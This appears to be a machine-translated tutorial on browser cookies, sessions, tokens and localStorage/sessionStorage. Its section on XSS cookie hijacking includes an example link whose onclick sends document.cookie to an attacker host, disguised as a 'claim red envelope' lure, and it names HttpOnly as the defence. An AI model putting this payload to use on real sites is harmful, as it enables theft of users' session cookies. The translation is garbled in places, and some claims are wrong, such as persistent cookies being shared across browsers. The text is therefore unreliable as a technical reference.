A, cookie
1, cookie is the first time a user accesses the server, the server returns to the client's identity id, after each request, cookie will be sent to the server to carry in the request header. [Popular talk, it is the first visit,
The server generates a cylinder (session) and then open the lock key (cookie) back to the client, after each time a user accesses the server will carry keys to unlock access]
2, cookie if you do not set the expiration time, that is, the session cookie, the browser is closed disappear. Otherwise, it is persistent cookie, before they expire, cookie is always present, and persistent cookie can be shared by different browsers.
3, the front end can be
document.cookie = "user=heihei";
console.log(document.cookie);
Set and retrieve the cookie, you can set an expiration time, limited in size, can store only about 4kb.
4, cookie attributes:
A, the cookie domain, the server can generate Cookie response to the set-Cookie header to add a Domain property to control which sites can see the cookie, such as:
Set-Cookie: name="heihei"; domain="m.zhuanzhuan.58.com"
If a user visits is m.zhuanzhuan.58.com that will be sent cookie: name = "heihei", if a user visits www.aaa.com (non zhuanzhuan.58.com) will not send this Cookie.
B, and if the cookie subfield is set, then the sub-domain may access the primary domain cookie, whereas the primary domain cookie can not access the sub-domain, related to the path attribute noon
For example: m.zhuanzhuan.58.com and m.zhaunzhuan.58.com/user/ both url. m.zhuanzhuan.58.com set a cookie
Set-cookie: id="123432";domain="m.zhuanzhuan.58.com";
m.zhaunzhuan.58.com/user/ set cookie:
Set-cookie:user="wang", domain="m.zhuanzhuan.58.com"; path=/user/
But access to other paths will get m.zhuanzhuan.58.com/other/
cookie: id="123432"
If you will get access m.zhuanzhuan.58.com/user/
cookie: id="123432" cookie: user="wang"
c、secure
A property secure, cookie will only be sent to the server at https protocol encryption situation. But this is not the most secure, because of its inherent insecurity of sensitive information should cookie is not transmitted by.
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure;
5, cookie hijacking (cross-site scripting XSS)
Use cross-site scripting technology can steal cookie. When the operation site allows javascript cookie, the session attacker for malicious code attacks the user will occur, and can get the user cookie information.
example:
<a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>
When the user clicks on this link, the browser will execute onclick inside the code, the results of the site the user's cookie data will be sent to the attacker's server abc.com.
An attacker can also take out cookie thing.
Solution: You can HttpOnly attribute cookie, and set HttpOnly property, javascript code will not operate cookie.
二、session
A session mechanism, is used to record information, it is stored on the server, without size limitation.
Three, token
1, token means "token" is a series of strings, the server generates, as a client identification requests.
2, when the user first logs in, the server generates a token and this token is returned to the client after the client request came just take this token data without the need to bring the user name and password again.
3, a simple token of the composition; uid (user's unique identity), time (timestamp of the current time), sign (Signature, several former hashing algorithm to compress into a certain length of token hexadecimal string .
To prevent leakage token).
The client uses the user name and password to log requests. The server receives the request, verify the user name and password. After successful authentication, the server will generate a token, and sends this token to the client.
The client after receiving the token store it up, can be placed on cookie or Local Storage (local storage) in. Every time a client sends a request to the server will need to bring the server issued token.
The server receives the request, and then to verify that the client requests inside with a token, if the validation is successful, the client returns the requested data.
Four, WebStorage
WebStorage two main objectives: (1) A path provided outside the cookie store session data. Data present the mechanism (2) to provide a large storage across sessions.
HTML5's WebStorage provides two API: localStorage (local storage) and sessionStorage (session storage).
1, Life Cycle: localStorage: localStorage life cycle is permanent, after closing the page or browser data in localStorage will not disappear.
localStorage unless the initiative to remove data, otherwise the data will never disappear.
sessionStorage life cycle is only valid in the current session. sessionStorage is homologous window is always present in the data. As long as the browser window is not closed,
Even refresh the page, the data still exists. But sessionStorage will be destroyed after you close the browser window.
Meanwhile a separate window open with the same page, sessionStorage is not the same.
2, storage size: localStorage sessionStorage size and storing data are generally: 5MB
3, the storage location: localStorage and sessionStorage are stored in the client, not interactive communication with the server.
4, the stored content type: localStorage sessionStorage and only store string type, can be used for complex objects and parse JSON stringify ECMAScript object to provide a process
5、获取方式:localStorage:window.localStorage;;sessionStorage:window.sessionStorage;。
6, application scenarios: localStoragese: commonly used in long-term Log (+ determine whether the user is logged in), suitable for long-term preservation of data locally. sessionStorage: single sign-sensitive account;